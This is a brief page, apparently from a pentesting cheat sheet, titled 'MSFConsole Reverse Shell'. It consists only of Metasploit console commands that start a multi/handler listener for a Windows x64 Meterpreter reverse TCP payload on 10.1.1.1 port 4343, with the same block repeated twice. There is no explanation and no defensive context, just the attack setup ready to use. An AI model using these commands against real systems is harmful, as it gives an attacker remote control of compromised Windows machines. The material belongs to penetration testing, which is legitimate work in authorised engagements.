MSFConsole Reverse Shell
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.1.1.1
set lport 4343
Last updated
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.1.1.1
set lport 4343
Last updated